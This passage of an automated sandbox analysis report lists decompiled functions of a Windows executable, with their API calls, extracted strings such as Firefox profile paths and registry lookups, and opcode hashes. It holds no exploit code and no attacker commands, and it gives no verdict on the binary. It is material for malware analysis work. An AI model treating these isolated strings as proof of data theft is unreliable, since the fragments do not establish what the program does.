                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 00503288: __EH_prolog3.LIBCMT ref: 0050328F
                                                                                                                          • Part of subcall function 00503288: _malloc.LIBCMT ref: 0050329B
                                                                                                                        Strings
                                                                                                                        • \Mozilla\Firefox\Profiles\, xrefs: 005035C8
                                                                                                                        • \Mozilla\Profiles\default\, xrefs: 005035FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteEnterLeave_malloc
                                                                                                                        • String ID: \Mozilla\Firefox\Profiles\$\Mozilla\Profiles\default\
                                                                                                                        • API String ID: 4289920900-1112706577
                                                                                                                        • Opcode ID: ac2d6f77105ca4905a64da071747f833eaf62ee7cd31e3ab46fd7af5e7d3ba8e
                                                                                                                        • Instruction ID: 34b72d607ab1a7d6e289004e4756f08ea93e8813113aac19830773f17794f34d
                                                                                                                        • Opcode Fuzzy Hash: ac2d6f77105ca4905a64da071747f833eaf62ee7cd31e3ab46fd7af5e7d3ba8e
                                                                                                                        • Instruction Fuzzy Hash: 2331D134401784EAD711EB75C956BCEFBF5AF22304F50865DA097631E2CBB82B08CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00502644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050264B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004E91D9: __EH_prolog3.LIBCMT ref: 004E91E0
                                                                                                                          • Part of subcall function 004C47CD: __EH_prolog3.LIBCMT ref: 004C47D4
                                                                                                                          • Part of subcall function 004E9FA6: __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                                          • Part of subcall function 004E9FA6: CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                                        Strings
                                                                                                                        • eingehende IPC-Verbindung, xrefs: 0050265B
                                                                                                                        • WatitingThread.new ConnectionThread.Failed, xrefs: 005026F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CreateCriticalInitializeSectionThread
                                                                                                                        • String ID: WatitingThread.new ConnectionThread.Failed$eingehende IPC-Verbindung
                                                                                                                        • API String ID: 991770091-341428905
                                                                                                                        • Opcode ID: e9e2a0bde2239673c7c78f3e8bcf047704431c895a13c5442fad62983a1c466a
                                                                                                                        • Instruction ID: 95a725770c04ea122dbc4d0f34c902012e069460ecc3f0c55dc72dfd3e64f628
                                                                                                                        • Opcode Fuzzy Hash: e9e2a0bde2239673c7c78f3e8bcf047704431c895a13c5442fad62983a1c466a
                                                                                                                        • Instruction Fuzzy Hash: B921AEB0900249EBEB04EBE5C88BAEEBF74AF55318F10424EF251572C2D7B45E44C7A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004D9A5D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D9A64
                                                                                                                          • Part of subcall function 004D91DF: __EH_prolog3.LIBCMT ref: 004D9201
                                                                                                                          • Part of subcall function 004D91DF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004D9306
                                                                                                                          • Part of subcall function 004D91DF: RegEnumKeyExW.ADVAPI32(?,00000000,80000001,?,00000000,00000000,00000000,?), ref: 004D933F
                                                                                                                          • Part of subcall function 004D91DF: RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000001,00000000), ref: 004D93F5
                                                                                                                          • Part of subcall function 004D843A: __EH_prolog3.LIBCMT ref: 004D8441
                                                                                                                          • Part of subcall function 004D843A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020006,?,?,?,?,?,?,00000004,004D9BA1,0084C304), ref: 004D8467
                                                                                                                          • Part of subcall function 004D843A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000004,004D9BA1,0084C304), ref: 004D8474
                                                                                                                          • Part of subcall function 004D91DF: RegEnumValueW.ADVAPI32(?,00000000,80000001,00000100,00000000,?,00000000,?), ref: 004D96CD
                                                                                                                          • Part of subcall function 004D91DF: RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000001,00000000,00000000), ref: 004D99EA
                                                                                                                          • Part of subcall function 004D91DF: RegCloseKey.ADVAPI32(80000002), ref: 004D9A05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumH_prolog3$Open$Value
                                                                                                                        • String ID: Machine:$User:
                                                                                                                        • API String ID: 1442275762-3964720792
                                                                                                                        • Opcode ID: 3d53818ae46bfb57098b81b26dcc3d26c91aa927d84ecbebe061918792f3a5bf
                                                                                                                        • Instruction ID: d51dc8bd3b0e1553d8746914cd8aad9d185616760c972f5bcd4c4530a76a30b2
                                                                                                                        • Opcode Fuzzy Hash: 3d53818ae46bfb57098b81b26dcc3d26c91aa927d84ecbebe061918792f3a5bf
                                                                                                                        • Instruction Fuzzy Hash: CB219170D11249ABDB14FF79C55B2AD7F71AF41324F20426EE5102B3D2CA390F09979A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E00C1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E00CC
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteInitialize
                                                                                                                        • String ID: UNCHANGED$VerifyIP
                                                                                                                        • API String ID: 4214761318-2930671668
                                                                                                                        • Opcode ID: 91eef4a2171dda14f14aa97f33a6647f1de379d807220f6d47e0486ea178ed87
                                                                                                                        • Instruction ID: cdd2f9ab1fcc20d1d968178ed03b8e7fc89dd10e219b05648128e262eb6260d3
                                                                                                                        • Opcode Fuzzy Hash: 91eef4a2171dda14f14aa97f33a6647f1de379d807220f6d47e0486ea178ed87
                                                                                                                        • Instruction Fuzzy Hash: 9C21C471800288EEDB05EBA4C892BDD7B74AF21304F1484AEE44667292EF746F49CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004924B9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004924C0
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00492504
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • Integer: Min must be no greater than Max, xrefs: 004924D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                                                        • String ID: Integer: Min must be no greater than Max
                                                                                                                        • API String ID: 1412866469-615354371
                                                                                                                        • Opcode ID: a927585a2eb05c94274044061798f93cf7d22b42e7853b4a6d763328dca123f7
                                                                                                                        • Instruction ID: c8a48653ccca1a8f3c14392122cb830fe1290718b987010d167ecb8d9443d1bc
                                                                                                                        • Opcode Fuzzy Hash: a927585a2eb05c94274044061798f93cf7d22b42e7853b4a6d763328dca123f7
                                                                                                                        • Instruction Fuzzy Hash: 9F110D3190020AAADF05FF91CC56EDEBF75BF04304F10402AF918A71A1DB799A15DB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00503288, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050328F
                                                                                                                        • _malloc.LIBCMT ref: 0050329B
                                                                                                                          • Part of subcall function 00537172: __FF_MSGBANNER.LIBCMT ref: 00537195
                                                                                                                          • Part of subcall function 00537172: RtlAllocateHeap.NTDLL(00000000,005343C7,00000000,00000002,00000000,?,005343D6,?), ref: 005371EA
                                                                                                                          • Part of subcall function 00503185: __EH_prolog3.LIBCMT ref: 0050318C
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        • ProxySearch.setUserBaseDir: getAppDataPathImpersonate failed, xrefs: 005032ED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$AllocateDeleteEnterHeapInitializeLeave_malloc
                                                                                                                        • String ID: ProxySearch.setUserBaseDir: getAppDataPathImpersonate failed
                                                                                                                        • API String ID: 2960791462-1931582195
                                                                                                                        • Opcode ID: e3bf6049251acef1625ed508114717d66b815a9550251d7521e1f24097b6a237
                                                                                                                        • Instruction ID: 430bb1baf6292b4e874a3d2895d1707d366e238aeab348e772ec6d431cb33c26
                                                                                                                        • Opcode Fuzzy Hash: e3bf6049251acef1625ed508114717d66b815a9550251d7521e1f24097b6a237
                                                                                                                        • Instruction Fuzzy Hash: 8601C07180120AAAEB14FFE4C8569EDBF79AF95310F20016EB012A71D2DB745B45C76A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004943FF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00494406
                                                                                                                          • Part of subcall function 0047F8AC: __EH_prolog3.LIBCMT ref: 0047F8B3
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0049447F
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • MontgomeryRepresentation: Montgomery representation requires an odd modulus, xrefs: 00494450
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                                                        • String ID: MontgomeryRepresentation: Montgomery representation requires an odd modulus
                                                                                                                        • API String ID: 1412866469-124676765
                                                                                                                        • Opcode ID: 4c4410a684e301eed79b65552161e3fe95e87a1816b91054b8c755a928fb9bfe
                                                                                                                        • Instruction ID: a3c743a33cdbe00fafea3e9a56f4300eb4c700835b9eccd05e2b5838c060713b
                                                                                                                        • Opcode Fuzzy Hash: 4c4410a684e301eed79b65552161e3fe95e87a1816b91054b8c755a928fb9bfe
                                                                                                                        • Instruction Fuzzy Hash: 5A11A371800105AADF05EF94C982BCDBF75AF18304F4540A9F905AB197D779DA09C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00504B0D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00504B47
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00504B54
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8H_prolog3Throw_malloc
                                                                                                                        • String ID: b>F
                                                                                                                        • API String ID: 1631339918-1785215364
                                                                                                                        • Opcode ID: d463214447618252c6b627d89a1ca0a8b5e2d8c26fc86f8b42305492a84e0373
                                                                                                                        • Instruction ID: f6d54aae56baef6531c4be1c54bf0439bd89ec727806600029007dd471f88795
                                                                                                                        • Opcode Fuzzy Hash: d463214447618252c6b627d89a1ca0a8b5e2d8c26fc86f8b42305492a84e0373
                                                                                                                        • Instruction Fuzzy Hash: BB01A2B0A102049EEB0CEF649816B5E7BB5BB40320F10867DEA26DB2D2CB74D504CB84
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B222E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B2235
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004B226E
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • invalid vector<T> subscript, xrefs: 004B2248
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
